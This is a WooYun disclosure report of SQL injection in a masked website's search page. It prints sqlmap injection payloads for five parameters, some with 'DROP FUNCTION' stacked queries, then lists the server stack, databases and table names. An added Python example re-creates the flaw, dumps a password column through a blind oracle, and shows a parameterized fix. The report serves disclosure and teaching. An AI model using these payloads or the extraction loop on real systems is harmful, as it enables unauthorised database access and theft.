WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-08-12: Details reported to the vendor; awaiting vendor handling
2015-08-12: CNCERT (National Internet Emergency Center) has not yet been able to reach the affected organization; details disclosed only to the reporting agency
2015-08-22: Details disclosed to core white hats and domain experts
2015-09-01: Details disclosed to regular white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public
As in the title.
Target: http://**.**.**.**/searchlist.aspx?p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr. (GET)

sqlmap:
sqlmap identified the following injection point(s) with a total of 1010 HTTP(s) requests:
---
Parameter: txtAuthor (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98';IF(3089=3089) SELECT 3089 ELSE DROP FUNCTION Dxme--&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.

Parameter: txtSource (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1';IF(5277=5277) SELECT 5277 ELSE DROP FUNCTION hXrh--&txtstarttime=1&txttitle=Mr.

Parameter: txtendtime (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=(SELECT (CASE WHEN (8983=8983) THEN 8983 ELSE 8983*(SELECT 8983 FROM master..sysdatabases) END))&txtSource=1&txtstarttime=1&txttitle=Mr.

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1 AND 2790=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2790=2790) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txtSource=1&txtstarttime=1&txttitle=Mr.

Parameter: txttitle (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1&txttitle=Mr.';IF(1707=1707) SELECT 1707 ELSE DROP FUNCTION xozv--

Parameter: txtstarttime (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=(SELECT (CASE WHEN (6166=6166) THEN 6166 ELSE 6166*(SELECT 6166 FROM master..sysdatabases) END))&txttitle=Mr.

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: p=0&rdtj=1&selectType=0&txtAuthor=JNgZVv98&txtendtime=1&txtSource=1&txtstarttime=1 AND 2897=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2897=2897) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)))&txttitle=Mr.
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Data:
available databases [9]:
[*] bobo111501
[*] db_TC
[*] fjtjnew
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
Example:
Database: fjtjnew
[34 tables]
+------------------+
| TC_News          |
| TC_News_Class    |
| TC_Work          |
| TC_Work_Class    |
| TC_Work_Url      |
| TC_special_news  |
| dtproperties     |
| sysconstraints   |
| syssegments      |
| tJgcx            |
| tLinks           |
| tMyzj            |
| tMyzj_List       |
| tNews            |
| tNewsClass       |
| tNewsUn          |
| tSubOptions      |
| tSubTitle        |
| tSubject         |
| tSysMenus        |
| tSysUsers        |
| tTgxx            |
| tTjlm            |
| tWork            |
| tWorkClass       |
| tWorkUrl         |
| tZfYjx           |
| tZfxxgkClass     |
| tZfysqgk         |
| tZrxx            |
| tZxft            |
| tZxftImg         |
| tZxftInfo        |
| tZxftWtzj        |
+------------------+
Stopped here; the test went no further than proving the point.
As above.
Filter the input.
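The sqlmap output above reports two techniques: boolean-based blind (sqlmap asks yes/no questions and compares the page it gets back) and error-based (sqlmap wraps a value in CONVERT(INT, ...) so the server's conversion error echoes it, bracketed by the CHAR(...) delimiters). The following is an added example, not code from the report or from the target site: it re-creates the unsafe query pattern behind searchlist.aspx in miniature, shows how a boolean oracle alone is enough to dump a string such as a password (the mechanism behind the database and table listing), decodes the CHAR(...) delimiters and parses a conversion-error message the way sqlmap does, and shows the parameterized form that makes the same input harmless. SQLite stands in for the MSSQL 2000 back end (the MSSQL equivalents of the functions used are given in comments; the stacked-query `;IF ... DROP FUNCTION` form is MSSQL specific and is not re-created). The table names tNews and tSysUsers are borrowed from the dump; their columns, rows and the sample error message are invented.

```python
"""Added example (not from the original report): a miniature re-creation of the
searchlist.aspx injection, sqlmap's blind-extraction loop, and the hardened query.
SQLite stands in for MSSQL 2000; table contents are constructed sample data."""
import re
import sqlite3

# Constructed sample data: a tiny stand-in for the fjtjnew database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE tNews (id INTEGER, title TEXT, author TEXT);
    INSERT INTO tNews VALUES (1, 'Notice', 'editor');
    CREATE TABLE tSysUsers (username TEXT, password TEXT);
    INSERT INTO tSysUsers VALUES ('admin', 'S3cret!');
""")

# Constructed stand-in for the conversion error an error-based payload provokes;
# the CASE in the payload yields CHAR(49) = '1' when its condition is true.
SAMPLE_ERROR = ("Syntax error converting the varchar value 'qpxzq1qbxzq' "
                "to a column of data type int.")


def search_vulnerable(author: str) -> list:
    """The pattern the report implies: txtAuthor is concatenated into the SQL text."""
    sql = "SELECT title FROM tNews WHERE author = '" + author + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(author: str) -> list:
    """Hardened form: the value travels as a bound parameter, never as SQL."""
    sql = "SELECT title FROM tNews WHERE author = ?"
    return conn.execute(sql, (author,)).fetchall()


def oracle(condition: str) -> bool:
    """Boolean oracle: True if the injected condition keeps the row in the result.
    This is what sqlmap's true/false page comparison reduces to."""
    payload = "editor' AND (" + condition + ")--"
    return len(search_vulnerable(payload)) > 0


def blind_extract(subquery: str, max_len: int = 32) -> str:
    """Recover a string one character at a time by binary search on its code point,
    using only yes/no answers. MSSQL would use ASCII(SUBSTRING(...)) where SQLite
    has unicode(substr(...)). Past the end of the string unicode('') is NULL, every
    comparison is false and the search bottoms out at 0, which ends the loop."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


def decode_char_concat(expr: str) -> str:
    """Turn an MSSQL 'CHAR(113)+CHAR(112)+...' chain into the literal delimiter
    string sqlmap hides inside its error-based payload."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def parse_conversion_error(message: str, prefix: str, suffix: str):
    """Pull the value smuggled into a CONVERT(INT, ...) failure message, the way
    sqlmap reads its result back out of the error page."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), message)
    return m.group(1) if m else None


if __name__ == "__main__":
    prefix = decode_char_concat("CHAR(113)+CHAR(112)+CHAR(120)+CHAR(122)+CHAR(113)")
    suffix = decode_char_concat("CHAR(113)+CHAR(98)+CHAR(120)+CHAR(122)+CHAR(113)")
    print("delimiters:", prefix, suffix)
    print("error-based result:", parse_conversion_error(SAMPLE_ERROR, prefix, suffix))
    print("blind dump of tSysUsers.password:", blind_extract("SELECT password FROM tSysUsers"))
    print("vulnerable:", search_vulnerable("x' OR '1'='1"))
    print("parameterized:", search_parameterized("x' OR '1'='1"))
```

The fix the report suggests, filtering, is a weaker control than what search_parameterized shows: with a bound parameter the quote in `x' OR '1'='1` is data and the query returns nothing, with no per-character filter to get wrong. Filtering and validating the date and type fields (txtstarttime, txtendtime, selectType) is still worthwhile as a second layer, since the "Parameter replace" payloads above land in positions where a numeric or date value was expected.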
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2015-08-12 16:23
CNVD confirmed and reproduced the reported vulnerability; it has been forwarded through CNCERT to the Fujian branch, which will coordinate handling with the organization that operates the website.
None yet.